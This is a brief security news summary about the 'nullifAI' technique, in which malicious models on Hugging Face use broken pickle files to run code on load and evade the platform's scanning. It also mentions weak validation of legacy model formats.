Researchers have identified malicious machine learning (ML) models on Hugging Face, leveraging a novel technique involving ‘broken’ pickle files to evade detection. This attack, dubbed ‘nullifAI’, abuses the Pickle file serialization process, allowing Python code execution during ML model deserialization. The malicious models were not initially flagged as unsafe by Hugging Face’s security mechanisms.
Vulnerabilities in Hugging Face’s model-loading libraries allow for malicious model uploads leading to code execution. The use of deprecated methods and a lack of robust validation for legacy model formats create opportunities for attackers to inject and execute arbitrary code. This affects various ML frameworks integrated with Hugging Face.